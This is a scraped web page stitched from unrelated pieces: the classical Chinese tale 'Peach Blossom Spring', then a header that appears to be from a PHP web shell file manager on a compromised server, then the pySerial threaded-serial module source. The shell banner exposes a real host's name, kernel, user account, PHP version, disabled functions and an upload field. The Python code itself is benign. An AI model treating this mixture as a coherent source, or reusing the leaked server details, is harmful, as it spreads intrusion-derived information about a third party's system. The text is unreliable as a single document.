晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。 林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。 见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝) 既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。 南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。
|
Server : Apache System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64 User : rainic ( 1014) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /proc/self/root/usr/lib/python3.6/site-packages/serial/threaded/ |
Upload File : |
#!/usr/bin/env python3
#
# Working with threading and pySerial
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C) 2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
"""\
Support threading with serial ports.
"""
import serial
import threading
class Protocol(object):
    """\
    Base protocol as used by the ReaderThread.

    Every callback has a default implementation, so subclasses only need to
    override the events they are interested in.
    """

    def connection_made(self, transport):
        """Called when the reader thread is started; does nothing by default."""

    def data_received(self, data):
        """Called with snippets received from the serial port; no-op by default."""

    def connection_lost(self, exc):
        """\
        Called when the serial port is closed or the reader loop terminated
        otherwise.

        ``exc`` is re-raised when it is an Exception instance; any other
        value (e.g. None) is silently accepted.
        """
        if not isinstance(exc, Exception):
            return
        raise exc
class Packetizer(Protocol):
    """
    Cut the incoming byte stream into packets.

    Received data is collected in ``self.buffer``; whenever the buffer
    contains TERMINATOR (a null byte by default) the bytes in front of it are
    passed to handle_packet() without the terminator.
    The class also keeps track of the transport.
    """

    TERMINATOR = b'\0'

    def __init__(self):
        # bytes received so far that do not yet form a complete packet
        self.buffer = bytearray()
        # set in connection_made(), cleared again in connection_lost()
        self.transport = None

    def connection_made(self, transport):
        """Remember the transport for later use"""
        self.transport = transport

    def connection_lost(self, exc):
        """Drop the transport reference, then run the base class handling"""
        self.transport = None
        super(Packetizer, self).connection_lost(exc)

    def data_received(self, data):
        """Append ``data`` to the buffer and dispatch every complete packet"""
        self.buffer.extend(data)
        while self.TERMINATOR in self.buffer:
            # split off exactly one packet; the remainder stays buffered
            pieces = self.buffer.split(self.TERMINATOR, 1)
            self.buffer = pieces[1]
            self.handle_packet(pieces[0])

    def handle_packet(self, packet):
        """Process one packet - to be overridden by subclassing"""
        raise NotImplementedError('please implement functionality in handle_packet')
class FramedPacket(Protocol):
    """
    Read binary packets. Packets are expected to have a start and stop marker.

    Bytes between START and STOP are collected and handed to handle_packet();
    bytes seen outside of a packet go to handle_out_of_packet_data().
    The class also keeps track of the transport.
    """

    START = b'('
    STOP = b')'

    def __init__(self):
        # payload of the packet that is currently being received
        self.packet = bytearray()
        # True between a START marker and the following STOP marker
        self.in_packet = False
        # set in connection_made(), cleared again in connection_lost()
        self.transport = None

    def connection_made(self, transport):
        """Store transport"""
        self.transport = transport

    def connection_lost(self, exc):
        """Forget transport and discard any partially received packet"""
        self.transport = None
        self.in_packet = False
        del self.packet[:]
        super(FramedPacket, self).connection_lost(exc)

    def data_received(self, data):
        """Find data enclosed in START/STOP, call handle_packet"""
        for byte in serial.iterbytes(data):
            if byte == self.START:
                self.in_packet = True
            elif byte == self.STOP:
                self.in_packet = False
                # Hand over an immutable copy: the internal buffer is cleared
                # right below, which would otherwise also empty the object
                # the handler has just received.
                self.handle_packet(bytes(self.packet))
                del self.packet[:]
            elif self.in_packet:
                # ``byte`` is a length-1 bytes object (it is compared against
                # the bytes markers above), so it has to be added with
                # extend(); append() only accepts an integer on Python 3.
                self.packet.extend(byte)
            else:
                self.handle_out_of_packet_data(byte)

    def handle_packet(self, packet):
        """Process packets - to be overridden by subclassing

        ``packet`` is a bytes object with the data found between the START
        and STOP markers (markers not included).
        """
        raise NotImplementedError('please implement functionality in handle_packet')

    def handle_out_of_packet_data(self, data):
        """Process data that is received outside of packets

        Called once per byte; the default implementation ignores the data.
        """
        pass
class LineReader(Packetizer):
    """
    Read and write (Unicode) lines from/to serial port.

    Incoming packets are decoded with ENCODING before they are passed to
    handle_line(); outgoing text is encoded the same way. UNICODE_HANDLING
    is used as the error handler in both directions.
    """

    TERMINATOR = b'\r\n'
    ENCODING = 'utf-8'
    UNICODE_HANDLING = 'replace'

    def handle_packet(self, packet):
        """Decode a received packet and forward it to handle_line()"""
        line = packet.decode(self.ENCODING, self.UNICODE_HANDLING)
        self.handle_line(line)

    def handle_line(self, line):
        """Process one decoded line - to be overridden by subclassing"""
        raise NotImplementedError('please implement functionality in handle_line')

    def write_line(self, text):
        """
        Write text to the transport. ``text`` is a Unicode string; it is
        encoded and the TERMINATOR is appended before sending.
        """
        send = self.transport.write
        # payload and terminator are concatenated on purpose so that both go
        # out in one single write call
        send(text.encode(self.ENCODING, self.UNICODE_HANDLING) + self.TERMINATOR)
class ReaderThread(threading.Thread):
    """\
    Implement a serial port read loop and dispatch to a Protocol instance (like
    the asyncio.Protocol) but do it with threads.

    Calls to close() will close the serial port but it is also possible to just
    stop() this thread and continue to use the serial port instance otherwise.
    """

    def __init__(self, serial_instance, protocol_factory):
        """\
        Initialize thread.

        ``serial_instance`` is the port object that is read from and written
        to. ``protocol_factory`` is called without arguments when the thread
        starts running and has to return the protocol instance.

        Note that the timeout of ``serial_instance`` is set to one second once
        the reader loop starts, but only if the port does not provide a
        ``cancel_read`` method. Other settings are not changed.
        """
        super(ReaderThread, self).__init__()
        self.daemon = True
        self.serial = serial_instance
        self.protocol_factory = protocol_factory
        # cleared by stop() and when the reader loop ends
        self.alive = True
        # serializes write() and close()
        self._lock = threading.Lock()
        # set as soon as connection_made() has been attempted
        self._connection_made = threading.Event()
        self.protocol = None

    def stop(self):
        """Stop the reader thread.

        Waits up to two seconds for the thread to finish. The wait is skipped
        when the thread is not running or when stop() is called from the
        reader thread itself, as join() raises RuntimeError in those cases.
        """
        self.alive = False
        if hasattr(self.serial, 'cancel_read'):
            self.serial.cancel_read()
        if self.is_alive() and threading.current_thread() is not self:
            self.join(2)

    def run(self):
        """Reader loop"""
        if not hasattr(self.serial, 'cancel_read'):
            # without cancel_read() the loop can only notice stop() when a
            # read returns, so the read must not block indefinitely
            self.serial.timeout = 1
        self.protocol = self.protocol_factory()
        try:
            self.protocol.connection_made(self)
        except Exception as e:
            self.alive = False
            try:
                self.protocol.connection_lost(e)
            finally:
                # connection_lost() may re-raise; waiters in connect() and
                # __enter__ must be released in any case
                self._connection_made.set()
            return
        error = None
        self._connection_made.set()
        while self.alive and self.serial.is_open:
            try:
                # read all that is there or wait for one byte (blocking)
                data = self.serial.read(self.serial.in_waiting or 1)
            except serial.SerialException as e:
                # probably some I/O problem such as disconnected USB serial
                # adapters -> exit
                error = e
                break
            else:
                if data:
                    # separate try-except for the user-supplied callback
                    try:
                        self.protocol.data_received(data)
                    except Exception as e:
                        error = e
                        break
        self.alive = False
        self.protocol.connection_lost(error)
        self.protocol = None

    def write(self, data):
        """Thread safe writing (uses lock)"""
        with self._lock:
            self.serial.write(data)

    def close(self):
        """Close the serial port and exit reader thread (uses lock)"""
        # use the lock to let other threads finish writing
        with self._lock:
            # first stop reading, so that closing can be done on idle port
            self.stop()
            self.serial.close()

    def connect(self):
        """
        Wait until connection is set up and return the transport and protocol
        instances.

        Raises RuntimeError if the thread has already been stopped or if the
        connection was lost while it was being set up.
        """
        if not self.alive:
            raise RuntimeError('already stopped')
        self._connection_made.wait()
        if not self.alive:
            raise RuntimeError('connection_lost already called')
        return (self, self.protocol)

    # - -  context manager, returns protocol

    def __enter__(self):
        """\
        Enter context handler. May raise RuntimeError in case the connection
        could not be created.
        """
        self.start()
        self._connection_made.wait()
        if not self.alive:
            raise RuntimeError('connection_lost already called')
        return self.protocol

    def __exit__(self, exc_type, exc_val, exc_tb):
        """Leave context: close port"""
        self.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# test
if __name__ == '__main__':
    # Small self-test / usage demo: shows both the context manager and the
    # explicit start()/connect()/close() way of using ReaderThread.
    # pylint: disable=wrong-import-position
    import sys
    import time
    import traceback

    #~ PORT = 'spy:///dev/ttyUSB0'
    PORT = 'loop://'

    class PrintLines(LineReader):
        """Demo protocol that reports connection events and received lines on stdout."""

        def connection_made(self, transport):
            super(PrintLines, self).connection_made(transport)
            sys.stdout.write('port opened\n')
            self.write_line('hello world')

        def handle_line(self, data):
            sys.stdout.write('line received: {}\n'.format(repr(data)))

        def connection_lost(self, exc):
            if exc:
                # print_exc() expects a limit as first argument and only
                # reports the exception currently being handled; this method
                # is not called from an except block, so print the given
                # exception explicitly
                traceback.print_exception(type(exc), exc, getattr(exc, '__traceback__', None))
            sys.stdout.write('port closed\n')

    ser = serial.serial_for_url(PORT, baudrate=115200, timeout=1)
    with ReaderThread(ser, PrintLines) as protocol:
        protocol.write_line('hello')
        time.sleep(2)

    # alternative usage
    ser = serial.serial_for_url(PORT, baudrate=115200, timeout=1)
    t = ReaderThread(ser, PrintLines)
    t.start()
    transport, protocol = t.connect()
    protocol.write_line('hello')
    time.sleep(2)
    t.close()